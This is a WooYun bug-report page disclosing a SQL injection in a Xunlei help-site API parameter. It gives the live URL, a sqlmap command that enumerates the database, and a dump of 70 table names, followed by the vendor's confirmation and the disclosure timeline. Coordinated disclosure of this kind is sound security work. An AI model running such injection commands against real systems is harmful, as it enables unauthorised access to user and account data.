当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-089321

漏洞标题:迅雷某API接口存在SQL注入漏洞

相关厂商:迅雷

漏洞作者: 有杀气

提交时间:2014-12-30 12:49

修复时间:2015-02-13 12:50

公开时间:2015-02-13 12:50

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-30: 细节已通知厂商并且等待厂商处理中
2014-12-30: 厂商已经确认,细节仅向厂商公开
2015-01-09: 细节向核心白帽子及相关领域专家公开
2015-01-19: 细节向普通白帽子公开
2015-01-29: 细节向实习白帽子公开
2015-02-13: 细节向公众公开

简要描述:

额。。。感谢乌云,感谢党,终于会挖洞了,

详细说明:

http://dynamic.help.xunlei.com/getArticlesByClass.do?callback=jsonp1419913979216&_=1419913980510&contentno=0001000100020001
参数contentno存在sql注入,字符型

漏洞证明:

python sqlmap.py -u "http://dynamic.help.xunlei.com/getArticlesByClass.do?callback=jsonp1419913979216&_=1419913980510&contentno=0001000100020001" -p "contentno" --tables -D xlhelp2


结果

Database: xlhelp2
[70 tables]
+----------------------------+
| accountappeal |
| accountappeal_2010 |
| accountappeal_2011 |
| accountappeal_20110510 |
| accountappeal_2012 |
| accountappeal_20130802 |
| accountappealremark |
| accountappealresult |
| advplace |
| advs |
| appealgameinfo |
| articles |
| complaintsstatistics |
| contents |
| copartners |
| d |
| datatablebiz |
| datatabledetail |
| datatables |
| demonquestions |
| demonquestions_20110701 |
| formdata |
| forminfo |
| functionlogs |
| functions |
| gameactivity |
| gcid |
| hislogininfo |
| hotkeywords |
| hotquestions |
| libclassd |
| libclassm |
| libconfig |
| mailclass |
| mailinfo |
| mailsendtemp |
| menus |
| placardclass |
| placards |
| plusoperation |
| problemreplies |
| problemreplies_20110812 |
| productquestionclass |
| products |
| questions |
| questionsfeedbacks |
| researchdata |
| researchinfo |
| role_product |
| rolerights |
| roles |
| rtnappealidinfo |
| selfservice |
| stepreasons |
| userbbs |
| useronline |
| useronlinetime |
| users |
| usertobizno |
| usertofunction |
| usertomailclass |
| usertorole |
| workorder |
| workorder_20110812 |
| workorderdispatch |
| workorderdispatch_20110812 |
| workorderflow |
| workorderflow_20110812 |
| workorderquestionstat |
| xlusers |
+----------------------------+

修复方案:

好人一生平安

版权声明:转载请注明来源 有杀气@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-12-30 13:53

厂商回复:

感谢反馈。属于迅雷客服应用。

最新状态:

2014-12-30:请漏洞作者联系security at xunlei.com 以便发放奖励。2014年度的奖励将于2014年12月31日24时到期。


漏洞评价:

评论